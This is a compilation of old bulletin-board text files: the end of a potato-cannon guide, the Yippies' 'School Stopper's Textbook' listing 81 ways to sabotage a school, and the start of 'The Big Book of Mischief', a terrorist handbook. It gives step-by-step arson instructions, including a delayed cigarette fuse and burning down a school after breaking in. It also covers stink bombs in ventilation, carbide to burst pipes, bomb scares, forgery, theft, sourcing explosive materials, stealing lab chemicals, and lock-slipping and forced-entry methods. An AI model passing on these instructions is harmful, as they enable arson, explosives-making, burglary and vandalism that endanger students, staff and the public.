In the pneumatics industry, this device is called a quick exhaust valve. It's commonly used on truck air brakes. In an emergency, the quick exhaust valve dumps air from the spring brake chambers to apply the brakes fast. 


SAFETY
DO NOT FIRE THE CANNON AT ANYONE OR ANYTHING. At nearly 500 feet per second muzzle velocity, a potato would be lethal if it were to hit someone. 

The pipe should be clearly marked SCH-40 260 PSI. ACCEPT NO SUBSTITUTIONS or you will be reinventing the pneumatic hand grenade. 

When assembling the gun BE SURE TO USE THE PROPER TYPE OF PIPE CEMENT! Do not use cement made for ABS pipe. If you have any doubts about your gluing technique, GET PLUMBER TO HELP YOU! 

USE ONLY 100 PSI MAX! This gives the plastic pipe a safety factor of more than 2. 

KEEP THE CANNON AT ROOM TEMPERATURE! Exposure to cold temperatures can cause the pipe to become dangerously brittle. 

As pipe ages it may be a good idea to build a new cannon and discard your old one. All plastics have a limited life span and it would be very difficult to estimate the safe life of the cannon. ALWAYS KEEP THE TROUSER LEGS IN PLACE ON THE CHAMBER WHEN FIRING! 

BE CAREFUL and have fun! 

--------------------------------------------------------------------------------

/----------------------------------------------------------------------------\
|                       The School Stopper's Textbook                        |
|       A Guide To Disruptive Revolutionary Tactics for High-Schoolers       |
|                                                                            |
|  Written by unknown members of the Youth International Party (The Yippies) |
|      Reformatted for 80 columns by:  /\/oo\/\  Count Nibble  /\/oo\/\      |
|             From a text file originally typed by MONTY PYTHON              |
\----------------------------------------------------------------------------/
 
     The following section is reprinted from the 'School Stoppers Textbook', a
small section of the 'How to Revolt Handbook', the fourth book of.... 'The
Blacklisted News', available for 13 bucks from the Youth International Party
(Yippies).  OK here we go . . . 81 ways to trash your school.      

     Liberate your life -- smash your school!  The public schools are slowly
killing every kid in them, stifling their creativity and individuality making
them into non-persons.  If you are a victim of this one of the things you can
do is fight back.
     This chapter is not written for people who are not yet sure whether
school is good or bad.  It is written for students that realize the way that
compulsory education and grades destroy the natural curiosity so many children
feel ... who realize how the tracking system keeps the poor people and
minorities in our society on the bottom while keeping the rich and powerful on
the top ... who realize the danger of teaching complete obedience to authority
and who are fed up with the racism and sexism in schools.  It is written for
students who have 'gone through channels' trying to correct these problems and
who are tired of helplessly waiting while the schools destroy more and more
minds each day.  It is written for young people who realize that because they
are trapped in school they don't have a chance to learn what they need to know
to create a free and good life.
     Before trying any of the ideas in here you should think about the effect
they will have in view of the situation in your particular area.  Not all of
them will be effective at all times in all areas.  If you think of other ideas
please send them to us so we can print them in future editions. (YIP address
is same as Overthrow mag. in general section -sysop II)
     
---------------
WHAT YOU CAN DO
---------------

1.   Get a syringe (minus needle) or similar device.  Mix both tubes of epoxy
     glue with a little rubbing alcohol.  You now have about half an hour to
     fill locks, door jambs, etc. before glue hardens.  If you can't get the
     epoxy glue and syringe a tube of airplane cement can also be used
     although it is not as permanent. 
2.   An alternative use for the syringe is to pretend to shoot up while a
     teacher is watching.  If they speak to you tell them you have to do it
     because school is so horrible.
3.   Call the school and leave the phone off the hook.  The way some (but not
     all) phone systems work this will tie up their phone for as long as yours
     is off the hook.
4.   Protest U.S. aid to reactionary regimes abroad by defoliating plants
     around the school or by digging a bomb crater on the front lawn.  When
     the ecology freaks complain ask them where they were when the U.S. was
     doing the same thing to Indochina.
5.   Draw or paste something 'obscene' on pull-down wall maps or movie screens.
6.   Get some of the punch cards that your school uses for taking attendance.
     Punch new holes in them either with a keypunch machine or a screwdriver. 
     Then switch the cards with others wherever they are stored.  If you can
     figure out the code the cards are punched by this has even more
     possibilities.  You can often be just as effective without actually
     repunching the cards by redistributing them a few days after you collect
     them (particularly when they're used for attendence).
7.   Start an information service to get new students opinions and warnings
     about the teachers and administrators before enrollment day.
8.   Bad food?  Have a good old fashioned food riot.
9.   In gym classes or in hallways between classes have massive searches for
     'lost' contact lenses telling people not to walk through the hall or 'you
     might step on it'.
10.  If your school still has a dress code protest it having everyone do
     something disruptive that does not violate the code.  For example, dye
     your hair green with food coloring.
11.  Free all the animals in the biology classroom.
12.  Write a 'consumer report' on the 'education' you've been consuming. 
     Distribute it to parents at school functions.
13.  Periodically have students go to the office to have some rumor confirmed
     or denied.
14.  Perform citizen's arrests of administrators for destroying the minds of
     youth then telephone the police to come and take the criminals into
     custody.  (This would be an excellent guerilla theatre action).
15.  Rip off dishes and silverware from the cafeteria, towels from the gym,
     stencils and paper from the duplicating room, layout equipment from the
     art and drafting departments, tools from the wood shop, and light bulbs
     from the sockets.  Give them to a needy movement group.
16.  During lunch turn on and light all the gas jets in the science labs.
17.  Demand to see your school records on file.  (Everyone can see them.)
18.  You can make a very effective fuse by inserting a non-filter cigarette in
     a book of matches so that it touches the head of some matches and will
     ignite them when it burns down that far.  Then loosly crumple paper
     around the matches and cigarettes so that they are hidden.  Toss it in a
     wastebasket or any other area with a lot of papers preferrably in the
     office.  It takes about 5 minutes to ignite -- by then you can be on the
     other side of the building.  Practice this at home before trying it.
19.  Have giant coughing or sneezing epidemics in class or study hall. 
20.  Rub lipstick, glue, vaseline, or shit onto the doorknobs of the school's
     administrative offices.
21.  Swallow some snake bite antidote then walk into the principal's office.
     The antidote (most types are harmless -- make sure you get that kind)
     will make you vomit.  Do so all over his carpet, desk, clothing, etc.
     then apologize profusely.
22.  Pick up some dog training liquid at any pet store -- it smells like
     concentrated piss.  And if you can't figure out what to do with that then
     you shouldn't be reading this.
23.  Remove contents of teacher's mailboxes.  Print up everything that's
     confidential or interesting.
24.  Leave notes and hints that 'Tuesday's the day'.
25.  Impersonate parental voices and make irate phone calls to the office.
26.  Make a super stink bomb out of Hydrogen Sulfide and put somewhere in the
     ventilating system.  This has cleared school buildings for days.
27.  If your school has a suspended ceiling (a ceiling composed of rectangles
     or squares resting on a frame so that the rectangles can be pushed up)
     you can put a dead fish -- or anything else -- above them.  Or put it
     into empty lockers and glue them shut.
28.  Put signs on your locker saying 'this locker will self-destruct if opened
     for inspection'.
29.  Give your school library a subscription to a good underground newspaper
     from your area and insist that they make it available to students.
30.  Print up false notices frequently using the same format as the school
     uses and distribute them to the teachers' mailboxes.  Eventually they'll
     never know what to believe.
31.  Make your own passes, forms, tickets, etc. or lift them out of teachers'
     desks.
32.  Need a signature?  Collect things that have teachers' signatures on them.
     Paste them all down on a sheet of white paper and either xerox or print
     up a bunch of copies.  Forge when useful.  (When getting started you
     might put a piece of carbon paper under the signature with the carbon
     paper facing down on what you want signed.  Then trace over the name with
     a steady relaxed hand.  Practice makes perfect.)
33.  Do some revolutionary wall painting.  All you need is a can of spray
     paint (red?) plus a little imagination and courage.  Then write your
     favorite slogans on walls, sidewalks, blackboards, etc.  If you are a
     perfectionist you can make a stencil, but that limits the size of what
     you can do.  WEAR GLOVES or you will certainly get tell-tale paint on
     your spraying finger.
34.  Are certain teachers or administrators misbehaving?  Print up a rat sheet
     with their names and telephone numbers and distribute it.  Now students
     can call up at any time and reprimand them -- 3:00 AM for example.  Also
     you could order them pizzas ... plumbers ... think big!
35.  Break into your school at night and burn it down.  To get inside you can
     either hide in the building during the day and wait until the janitor
     leaves (know in advance what time that is), or come in later at night and
     either force your way through the door, find an open window, or break a
     window (see Monroe Mindfuck).  If you use the latter method do it a few
     hours or days in advance so you don't get caught if it attracts
     attention.  Be careful not to leave fingerprints -- wear gloves all the
     time if possible.  Once inside make sure the walls will light well by
     placing loose paper or wood around them, or squirting lighter fluid,
     kerosene, or gasoline onto them.  If a lot of burnable boxes are stacked
     in one area spread them around.  Start the fire from the inside of the
     building so it will take longer before it can be seen from the windows. 
     Make sure the fire has a way to travel from one burnable area to another.
     Of course you should wear dark clothes and know exactly where you are
     going when you split.
36.  Get hold of a film to be shown at a school assembly and splice in parts
     of another movie of your own choosing before the assembly.  A little
     imagination on your part will make for an unforgettable day.
37.  Clog up the drains of sinks with clay then turn on the water after
     everyone leaves school.
38.  Teachers often leave gradebooks, conduct sheets, and attendance records
     unguarded.  Take every chance to help yourself.
39.  Put up posters all around the school.  To make them stick permanently use
     Pet evaporated milk for glue.
40.  You could ice-pick tires as a warning -- but make sure you have a total
     enemy before you put sugar in their gas tank.
41.  Start wailing in the halls.
42.  If you can't find any skunks, let chickens loose in the school ... or
     pigeons.
43.  Create the 'WEB OF THREAD' in your classroom.  Have everybody in your
     class bring a spool of thread -- with extras for people who forget.  Tie
     your thread onto something and pass the spools around till you run out,
     winding thread around everything.  (It is best to pick on one of your
     more dullwitted teachers for this one).  Expalin that you did it in the
     name of art.
44.  Carry and pretend to sell oregano rolled in papers and aspirin with the
     name filed off.
45.  Put Calcium Carbide (available in some parts of the country as 'Gopher-
     Go', also available in some hobby and joke shops) in a gelatin capsule
     and flush down a toilet or sink.  Calcium Carbide reacts violently with
     water, quickly producing large amounts of HIGHLY FLAMMABLE gas and
     bursting pipes, etc. as soon as the water dissolves the capsule.
46.  Ride a bicycle down a busy hall.
47.  Save your book reports and essays.  Give them to other students to use
     next year or re-use them yourself with different teachers.
48.  Play with lighting and microphone controls during 'important' assemblies.
49.  Flush things down the toilets (preferably faculty johns) like balloons
     filled with air, baseballs, M80's, huge amounts of toilet paper, etc. 
     Then build an ark.
50.  Start a campaign to have the letter Z appear everywhere as the mark of
     angry students.
51.  You can short-circuit the school's wiring by taking a regular plug with a
     short cord attached.  Connect the 2 wires with a switch between them. 
     Plug it in, turn the switch on, and you've blown a fuse.  Turn it off,
     pull it out, and try another.  You don't have to use the switch, but if
     you don't sometimes the current will arc and weld the plug to the socket.
52.  Set up a fake school and hire away the lousy teachers -- or put up
     notices inviting the entire school to a going away party for a teacher
     who isn't really leaving.
53.  Read the school budget.  Reprint and distribute a list of the stupid
     expenditures.
54.  Take booze to lunch in a thermos and pass it around.
55.  During some important test (SAT/ACT/etc. ) on each subject have some
     student who is good at that subject stand up and read the correct answers
     for as long as possible.  When they're finished or silenced have someone
     else stand up and do the same thing.  The test results will be worthless
     and it will have to be given over at great cost to the school.
56.  Take down the American flag in front of the school and put up one of your
     own.  The best way to do this is to lower the flag that's already up
     replace it with your flag and cut the rope about a foot below where the
     flag is attached.  Then tie a slip knot around the other end of the rope
     that is hanging down to raise the flag.  At this point there is no way
     your flag can be lowered without someone climbing up the flagpole.
57.  Put alarm clocks in various lockers set on 'loudest'.  Set the alarm
     clocks so they will go off about every 10 minutes then close and lock the
     lockers.
58.  Have a group of people march around the school with a flag singing the
     Star Spangled Banner.  If the administration tries to punish you
     telephone your local radio stations and patriotic groups and complain
     that your school is being run by pinkos.
59.  In a class where there is a rule against chewing gum have everyone blow a
     bubble at the same time one day.
60.  Many schools have automatic sprinkler systems which go off automatically
     when sensors in the ceiling feel too much heat.  Find the sensors and
     hold up a match to them.
61.  Persuade the graduating class to use their senior gift money for
     something useful or subversive.
62.  Reprint School Stoppers Textbook in your underground paper or on a
     leaflet or buy bulk copies and pass them around.
63.  Demand that all equipment being stored rather than being used be made
     available to students.
64.  If your school won't have a teacher evaluation make up some forms and do
     it yourself.  Compile the result and publicize them to students, faculty,
     school board, and community.
65.  Use your 'free choice' book reports, term papers, etc. to read
     revolutionary literature and further the political education of you and
     your class.
66.  Have a student lie on the ground.  When a teacher comes scream 'he
     jumped' and point to the roof or third floor window.  Mumble 'Fred dared
     him' or 'Maybe it was LSD.'
67.  Make an address list of disliked adults in your school.  Answer sex ads
     for them -- or order them a few gross items (C.O.D. of course).
68.  Toss handfuls of BB's on the floors of busy halls, assemblies, graduation
     ceremonies, weddings, funerals.
69.  Steal cafeteria trays or plates, burn large holes in them, and turn them
     into the school washer saying 'I guess the food did it'.
70.  Leave phony letters of resignation from teachers or administrators on the
     principal's desk.
71.  Get a small group to always carry screwdrivers and slowly dismantle the
     school.
72.  Lots of bomb scares tend to break up the boredom especially during exams
     or on beautiful days.
73.  Photograph teachers and administrators constantly -- even without film.
74.  If you've got the nerve piss in your pants while giving an oral report.
75.  Splice into your school's intercom system (from a remote hidden spot). 
     Now you have your own guerilla radio station.  Play on!
76.  Drop large bottles of ether in science class.
77.  Hang your teacher!  Hang a hangman's noose from a tree - make a dummy and
     hang the dummy from the noose.  Pin notes on it like 'Weatherbee in '73.'
     To add realism put holes in the body then let dilute ketchup trickle
     down.
78.  Newspaper stands in buildings are usually left unguarded.  Take out
     papers and replace with rotten comics or papers.
79.  Put a rotten apple or stale sandwich on teacher's desk.
80.  If your school intercom has phones that connect into the intercom
     switchboard, put a small magnet either where the cord comes out of the
     handset or in the part where you hear.  If the intercom just has a
     speaker, put the magnet near or on one of the electrical connections of
     the speaker.  In either case it will short out the system.  It may take
     weeks for them to find the trouble.
81.  Take the door of the administration offices off its hinges but leave it
     standing there so that when the principal tries to open the door in the
     morning it will have a slightly crushing effect.

/----------------------------------------------------------------------------\
!        The Vault AE/BBS System ... 24 hours ........ (218) 724-4210        !
!        The Pipeline BBS/Cat-Fur 300/1200 10 Megs ... (718) 351 5678        !
!        Terrapin Station AE  pw:CICADA  300/1200 .... (505) 865 0883        !
\----------------------------------------------------------------------------/


THE BIG BOOK OF MISCHIEF 1.3   10-06-91   [REPLACES TBBOM12.ZIP/ TBBOM12.TXT]


                  BOX 438, 71 E. 32nd St. Chicago, IL 60616

Make all checks and money orders payable to: LASERSCRIBE, INC.



Preface



   By version 1.5 I hope to have .GIF files to replace the current character
graphics, and to have removed all duplicate entries.

Note from the Editor:

   To make suggestions, corrections, or to
  submit new information, send mail to:
  to DAVID RICHARDS on the RIPCO BBS, or:
                                          cshawk_pro38@iitvax.iit.edu
                                          cshawk_pro38@iitvax.bitnet

Please refer to any items by section number or EXACT section heading.


Note from the author:

  Remember, the First Amendment is not a shield. Care must be taken to ensure
that no law is broken when information is gained or divulged. I have read
every word of this file, and swear that no article of this document is illegal
in any way.


                               REVISION HISTORY

1987-1989         Compilation of original file
Early 1990        Original file lost in crash
August 8, 1990    File reborn as The Compleat Terrorist Today, August 8th,
                 1990, at 1 AM, I found a copy of The Terrorist's Handbook on
                 a BBS, and recombined it with some other G-files.
March 31, 1991    In February, I had a major loss of data, but regained TCT
                 from a local BBS.  I did some cosmetic work and killed some
                 redundancies, and renamed the file to TBBOM. Total file size
                 is now about 172 printed pages. (You may wish to print this
                 file out and bind it)
April 12, 1991    File revised by Vlad Tepes on Ripco II.  Some deletions and
                 many valuable additions. I (The Editor) felt that the file
                 should have version numbers, so, in light of the additions by
                 Vlad Tepes, the first volume number is 1.1.
July 29, 1991     Revisions and addenda by Vlad Tepes.  A revision is a change
                 in the information (The original text is immediately followed
                 by the new information) and an addendum refers to new
                 information.
October 6, 1991   Vlad Tepes assumes the job of co-author/editor. A few
                 neccessary deletions are made, as well as minor cosmetic
                 changes and additions.


begin  "THE BIG BOOK OF MISCHIEF"


1.0     INTRODUCTION

     Chaos Industries (CHAOS), is proud to present this revised edition of The
Terrorist's Handbook.  First and foremost, let it be stated that Chaos
Industries assumes no responsibilities for any use of the information
presented in this publication.  The purpose of this is to show the many
techniques and methods used by those people in this and other countries who
employ terror as a means to acheive political and social goals. The techniques
described here may be found in public libraries, and can often be carried out
by a terrorist with minimal resources. The processes and techniques herein
SHOULD NOT BE CARRIED OUT UNDER ANY CIRCUMSTANCES!! SERIOUS INJURY OR DEATH
COULD RESULT FROM ATTEMPTING TO PERFORM ANY OF THE METHODS IN THIS
PUBLICATION. ALTHOUGH ALL EFFORTS HAVE BEEN MADE TO INSURE ACCURACY THIS IS
MERELY FOR READING ENJOYMENT, AND IS NOT INTENDED FOR ACTUAL USE!!

We feel that it is important that everyone has some idea of just how easy it
is for a terrorist to perform acts of terror; that is the justification for
the existence of this publication.

1.1          Table of Contents
             ÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄ

2.0 .......  BUYING EXPLOSIVES AND PROPELLANTS
2.01 ........  Black Powder
2.02 ........  Pyrodex
2.03 ........  Rocket Engine Powder
2.04 ........  Rifle/Shotgun Powder
2.05 ........  Flash Powder
2.06 ........  Ammonium Nitrate
2.1 .......  ACQUIRING CHEMICALS
2.11 ........  Techniques for Picking Locks
2.2 .......  LIST OF USEFUL HOUSEHOLD CHEMICALS AND AVAILABILITY 
2.3 .......  PREPARATION OF CHEMICALS
2.31 ........  Nitric Acid
2.32 ........  Sulfuric Acid
2.33 ........  Ammonium Nitrate
3.0 .......  EXPLOSIVE RECIPES
3.01 ........  Explosive Theory
3.1 .......  IMPACT EXPLOSIVES
3.11 ........  Ammonium Triiodide Crystals
3.12 ........  Mercury Fulminate
3.13 ........  Nitroglycerine
3.14 ........  Picrates
3.2 .......  LOW ORDER EXPLOSIVES
3.21 ........  Black Powder
3.22 ........  Nitrocellulose
3.23 ........  Fuel + Oxodizer mixtures
3.24 ........  Perchlorates
3.25 ........  Flash Powder
3.3 .......  HIGH ORDER EXPLOSIVES
3.31 ........  R.D.X. (Cyclonite)
3.32 ........  Ammonium Nitrate
3.33 ........  ANFOS
3.34 ........  T.N.T.
3.35 ........  Potassium Chlorate
3.36 ........  Dynamite
3.37 ........  Nitrostarch Explosives
3.38 ........  Picric Acid
3.39 ........  Ammonium Picrate (Explosive D)
3.40 ........  Nitrogen Trichloride
3.41 ........  Lead Azide
3.5 .......  OTHER "EXPLOSIVES"
3.51 ........  Thermite
3.52 ........  Molotov Cocktails
3.53 ........  Chemical Fire Bottle
3.54 ........  Bottled Gas Explosives
3.6 .........  Dry Ice
4.0 .......  USING EXPLOSIVES
4.1 .......  SAFETY
4.11 ........ How Not To Get Killed
4.12 ........ Guidelines For Production
4.2 .......  IGNITION DEVICES
4.21 ........  Fuse Ignition
4.22 ........  Impact Ignition
4.23 ........  Electrical Ignition
4.24 ........  Electro - Mechanical Ignition
4.241 .......  Mercury Switches
4.242 .......  Tripwire Switches
4.243 .......  Radio Control Detonators
4.3 .......  DELAYS
4.31 ........  Fuse Delays
4.32 ........  Timer Delays
4.33 ........  Chemical Delays
4.4 .......  EXPLOSIVE CONTAINERS
4.41 ........  Paper Containers
4.42 ........  Metal Containers
4.43 ........  Glass Containers
4.44 ........  Plastic Containers
4.5 .......  ADVANCED USES FOR EXPLOSIVES
4.51 ........  Shaped Charges
4.52 ........  Tube Explosives
4.53 ........  Atomized Particle Explosions
4.54 ........  Lightbulb Bombs
4.55 ........  Book Bombs
4.56 ........  Phone Bombs
5.0 .......  SPECIAL AMMUNITION FOR PROJECTILE WEAPONS
5.1 .......  PROJECTILE WEAPONS (PRIMITIVE)
5.11 ........  Bow and Crossbow Ammunition
5.12 ........  Blowgun Ammunition
5.13 ........  Wrist Rocket and Slingshot Ammunition
5.2 .......  PROJECTILE WEAPONS (FIREARMS)
5.21 ........  Handgun Ammunition
5.22 ........  Shotguns
5.3 .......  PROJECTILE WEAPONS (COMPRESSED GAS)
5.31 ........  .177 Caliber B.B Gun Ammunition
5.32 ........  .22 Caliber Pellet Gun Ammunition
6.0 .......  ROCKETS AND CANNONS
6.1 .......  ROCKETS
6.11 ........  Basic Rocket-Bomb
6.12 ........  Long Range Rocket-Bomb
6.13 ........  Multiple Warhead Rocket-Bombs
6.2 ........ CANNONS
6.21 ........  Basic Pipe Cannon
6.22 ........  Rocket-Firing Cannon
6.23 ........  Reinforced Pipe Cannon
7.0 .......  PYROTECHNICA ERRATA
7.1 .........  Smoke Bombs
7.2 .........  Colored Flames
7.3 .........  Tear Gas
7.4 .........  Fireworks
7.41 ........  Firecrackers
7.42 ........  Skyrockets
7.43 ........  Roman Candles
8.0 .......  LISTS OF SUPPLIERS AND FURTHER INFORMATION
9.0 .......  CHECKLIST FOR RAIDS ON LABS
10.0 ......  USEFUL PYROCHEMISTRY
11.0 ......  ABOUT THE AUTHOR


2.0   BUYING EXPLOSIVES AND PROPELLANTS

     Almost any city or town of reasonable size has a gun store and one or
more pharmacies. These are two of the places that potential terrorists visit
in order to purchase explosive material.  All that one has to do is know
something about the non- explosive uses of the materials.  Black powder, for
example, is used in blackpowder firearms.  It comes in varying "grades", with
each different grade being a slightly different size.  The grade of black
powder depends on what the calibre of the gun that it is used in; a fine grade
of powder could burn too fast in the wrong caliber weapon.  The rule is: the
smaller the grade, the faster the burn rate of the powder.


2.01   BLACK POWDER

     Black powder is generally available in three grades.  As stated before, the
smaller the grade, the faster the powder burns.  Burn rate is extremely
important in bombs.  Since an explosion is a rapid increase of gas volume in a
confined environment, to make an explosion, a quick-burning powder is desirable.
The three common grades of black powder are listed below, along with the usual
bore width (calibre) of what they are used in.  Generally, the fastest burning
powder, the FFF grade is desirable.  However, the other grades and uses are
listed below:

     GRADE              BORE WIDTH               EXAMPLE OF GUN
     ÄÄÄÄÄ              ÄÄÄÄÄÄÄÄÄÄ               ÄÄÄÄÄÄÄÄÄÄÄÄÄÄ
     F                  .50 or greater           model cannon; some rifles
     FF                 .36 - .50                large pistols; small rifles
     FFF                .36 or smaller           pistols; derringers

     The FFF grade is the fastest burning, because the smaller grade has more
surface area or burning surface exposed to the flame front.  The larger grades
also have uses which will be discussed later.  The price range of black
powder, per pound, is about $8.50 - $9.00.  The price is not affected by the
grade, and so one saves oneself time and work if one buys the finer grade of
powder.  The major problems with black powder are that it can be ignited
accidentally by static electricity, and that it has a tendency to absorb
moisture from the air. To safely crush it, a one would use a plastic spoon and
a wooden salad bowl. Taking a small pile at a time, he or she would apply
pressure to the powder through the spoon and rub it in a series of strokes or
circles, but not too hard.  It is fine enough to use when it is about as fine
as flour.  The fineness, however, is dependant on what type of device one
wishes to make; obviously, it would be impracticle to crush enough powder to
fill a 1 foot by 4 inch radius pipe.  Any adult can purchase black powder,
since anyone can own black powder firearms in the United States.


2.02    PYRODEX

     Pyrodex is a synthetic powder that is used like black powder.  It comes
in the same grades, but it is more expensive per pound.  However, a one pound
container of pyrodex contains more material by volume than a pound of black
powder.  It is much easier to crush to a very fine powder than black powder,
and it is considerably safer and more reliable.  This is because it will not
be set off by static electricity, as black can be, and it is less inclined to
absorb moisture.  It costs about $10.00 per pound.  It can be crushed in the
same manner as black powder, or it can be dissolved in boiling water and
dried.


2.03        ROCKET ENGINE POWDER

     One of the most exciting hobbies nowadays is model rocketry.  Estes is
the largest producer of model rocket kits and engines.  Rocket engines are
composed of a single large grain of propellant.  This grain is surrounded by a
fairly heavy cardboard tubing.  One gets the propellant by slitting the tube
length- wise, and unwrapping it like a paper towel roll.  When this is done,
the gray fire clay at either end of the propellant grain must be removed.
This is usually done gently with a plastic or brass knife. The material is
exceptionally hard, and must be crushed to be used.  By gripping the grain in
the widest setting on a set of pliers, and putting the grain and powder in a
plastic bag, the powder will not break apart and shatter all over.  This
should be done to all the large chunks of powder, and then it should be
crushed like black powder. Rocket engines come in various sizes, ranging from
1/4 A - 2T to the incredibly powerful D engines.  The larger the engine, the
more expensive.  D engines come in packages of three, and cost about $5.00 per
package.  Rocket engines are perhaps the single most useful item sold in
stores to a terrorist, since they can be used as is, or can be cannibalized
for their explosive powder.

2.04       RIFLE/SHOTGUN POWDER

     Rifle powder and shotgun powder are really the same from a practicle
standpoint. They are both nitrocellulose based propellants. They will be
referred to as gunpowder in all future references. Smokeless gunpowder is made
by the action of concentrated nitric and sulfuric acid upon cotton or some
other cellulose material. This material is then dissolved by solvents and then
reformed in the desired grain size.  When dealing with smokeless gunpowder,
the grain size is not nearly as important as that of black powder. Both large
and small grained smokeless powder burn fairly slowly compared to black powder
when unconfined, but when it is confined, gunpowder burns both hotter and with
more gaseous expansion, producing more pressure. Therefore, the grinding
process that is often necessary for other propellants is not necessary for
smokeless powder. owder costs about $9.00 per pound. In most states any
citizen with a valid driver's license can buy it, since there are currently
few restrictions on rifles or shotguns in the U.S. There are now ID checks in
many states when purchasing powder at a retail outlet.  Mail-orders aren't
subject to such checks.  Rifle powder and pyrodex may be purchased by mail
order, but UPS charges will be high, due to DOT regulations on packaging.


2.05       FLASH POWDER

      Flash powder is a mixture of powdered aluminum metal and various
oxidizers. It is extremely sensitive to heat or sparks, and should be treated
with more care than black powder, with which it should NEVER be mixed. It is
sold in small containers which must be mixed and shaken before use. It is very
finely powdered, and is available in three speeds: fast, medium, and slow. The
fast flash powder is the best for using in explosives or detonators.

     It burns very rapidly, regardless of confinement or packing, with a hot
white "flash", hence its name.  It is fairly expensive, costing about $11.00.
It is sold in magic shops and theatre supply stores. Flash powder is often
made with aluminum and/or magnesium. Zirconium metal is the main ingredient in
flash BULBS, but is too expensive to be used in most flash powder mixtures.


2.06       AMMONIUM NITRATE

     Ammonium nitrate is a high explosive material that is often used as a
commercial "safety explosive"  It is very stable, and is difficult to ignite
with a match. It will only light if the glowing, red-hot part of a match is
touching it. It is also difficult to detonate; (the phenomenon of detonation
will be explained later) it requires a large shockwave to cause it to go high
explosive. Commercially, it is sometimes mixed with a small amount of nitro-
glycerine to increase its sensitivity. Ammonium nitrate is used in the "Cold-
Paks" or "Instant Cold", available in most drug stores. The "Cold Paks" consist
of a bag of water, surrounded by a second plastic bag containing the ammonium
nitrate. To get the ammonium nitrate, simply cut off the top of the outside bag,
remove the plastic bag of water, and save the ammonium nitrate in a well sealed,
airtight container, since it is rather hydroscopic, i.e. it tends to absorb
water from the air. It is also the main ingredient in many fertilizers.


2.1     ACQUIRING CHEMICALS

     The first section deals with getting chemicals legally. This section
deals with "procuring" them. The best place to steal chemicals is a college.
Many state schools have all of their chemicals out on the shelves in the labs,
and more in their chemical stockrooms. Evening is the best time to enter lab
buildings, as there are the least number of people in the buildings, and most
of the labs will still be unlocked.


2.11     TECHNIQUES FOR PICKING LOCKS

     If it becomes necessary to pick a lock to enter a lab, the world's most
effective lockpick is dynamite, followed by a sledgehammer.  There are
unfortunately, problems with noise and excess structural damage with these
methods. The next best thing, however, is a set of professional lockpicks.

These, unfortunately, are difficult to acquire. If the door to a lab is locked,
but the deadbolt is not engaged, then there are other possibilities. The rule
here is: if one can see the latch, one can open the door. There are several
devices which facilitate freeing the latch from its hole in the wall. Dental
tools, stiff wire ( 20 gauge ), specially bent aluminum from cans, thin
pocket knives, and credit cards are the tools of the trade. The way that all
these tools and devices are uses is similar: pull, push, or otherwise move the
latch out of its recess in the wall, thus allowing the door to open. This is
done by sliding whatever tool that you are using behind the latch, and forcing
the latch back into the door.

Most modern doorknob locks have two fingers. The larger finger holds the door
closed while the second (smaller) finger only prevents the first finger from
being pressed in when it (the second finger) is pressed in by the catchplate
of the door.  If you can separate the catch plate and the lock sufficiently
far, the second finger will slip out enough to permit the first finger to be
slipped.

(Ill. 2.11)       ___
                 |   }   <
   Small   ->   (|   }   <--- The large (first) finger
   second        |___}   <
   finger

Some methods for getting through locked doors are:

  1) Another method of forced entry is to use an automobile jack to force the
     frame around the door out of shape, freeing the latch or exposing it to
     the above methods. This is possible because most door frames are designed
     with a slight amount of "give". Simply put the jack into position
     horizontally across the frame in the vicinity of the latch, and jack it
     out. If the frame is wood it may be possible to remove the jack after
     shutting the door, which will relock the door and leave few signs of
     forced entry. This technique will not work in concrete block buildings,
     and it's difficult to justify an auto jack to the security guards.
  2) use a screwdriver or two to pry the lock and door apart.  While holding
     them apart, try to slip the lock.  Screwdrivers, while not entirely
     innocent, are much more subtle than auto jacks, and much faster if they
     work.  If you're into unsubtle, I suppose a crowbar would work too, but
     then why bother to slip the lock at all?
  3) Find a set of double doors.  They are particularly easy to pry apart far
     enough to slip.
  4) If the lock is occasionally accessible to you while open, "adjust" or
     replace the catchplate to make it operate more suitably (i.e., work so
     that it lets *both* fingers out, so that it can always be slipped).  If
     you want, disassembling the lock and removing some of the pins can make
     it much easier to pick.
  5) If, for some odd reason, the hinges are on your side (i.e., the door
     opens outward), remove the hinge pins (provided they aren't stopped with
     welded tabs).  Unfortunately, this too lacks subtlety, in spite of its
     effectiveness.
  6) If the door cannot be slipped and you will want to get through regularly,
     break the mechanism.  Use of sufficient force to make the first finger
     retreat while the second finger is retreated will break some locks (e.g.,
     Best locks) in such a way that they may thereafter be slipped trivially,
     yet otherwise work in all normal ways.  Use of a hammer and/or
     screwdriver is recommended. Some care should be used not to damage the
     door jamb when attempting this on closed and locked doors, so as not to
     attract the attention of the users/owners/locksmith/police/....
  7) Look around in desks.  People very often leave keys to sensitive things
     in them or other obvious places.  Especially keys to shared critical
     resources, like supply rooms, that are typically key-limited but that
     everyone needs access to.  Take measurements with a micrometer, or make a
     tracing (lay key under paper and scribble on top), or be dull and make a
     wax impression.  Get blanks for the key type (can be very difficult for
     better locks; I won't go into methods, other than to say that if you can
     get other keys made from the same blank, you can often work wonders with
     a little ingenuity) and use a file to reproduce the key.  Using a
     micrometer works best:  keys made from mic measurements are more likely
     to work consistently than keys made by any other method.  If you us
     tracings, it is likely to take many tries before you obtain a key that
     works reliably.  Also, if you can 'borrow' the cylinder and disassemble
     it, pin levels can be obtained and keys constructed.
  8) Simple locks, like desks, can be picked fairly easily.  Many desks have
     simple three or four pin locks of only a few levels, and can be
     consistently picked by a patient person in a few minutes.  A small
     screwdriver and a paper clip will work wonders in practiced hands.  Apply
     a slight torque to the lock in the direction of opening with the
     screwdriver.  Then 'rake' the pins with the unfolded paper clip.  With
     practice, you'll apply enough pressure with the screwdriver that the pins
     will align properly (they'll catch on the cylinder somewhere between the
     top and bottom of their normal travel), and once they're all lined up,
     additional pressure on the screwdriver will then open the lock.  This, in
     conjunction with (7) can be very effective.  This works better with older
     or sloppily machined locks that have a fair amount of play in the
     cylinder.  Even older quality locks can be picked in this manner, if
     their cylinders have been worn enough to give enough play to allow pins
     to catch reliably. Even with a well worn quality lock, though, it
     generally takes a *lot* of patience.
  9) Custodial services often open up everything in sight and then take
     breaks.  Make the most of your opportunities.
 10) No matter what you're doing, look like you belong there.  Nothing makes
     anyone more suspicious than someone skulking about, obviously trying to
     look inconspicuous.  If there are several of you, have some innocuous and
     normal seeming warning method ("Hey, dummy!  What time is it?") so that
     they can get anything suspicious put away.  Don't travel in large groups
     at 3 AM.  Remember, more than one car thief has managed to enlist a cop's
     aid in breaking into a car.  Remember this.  Security people usually
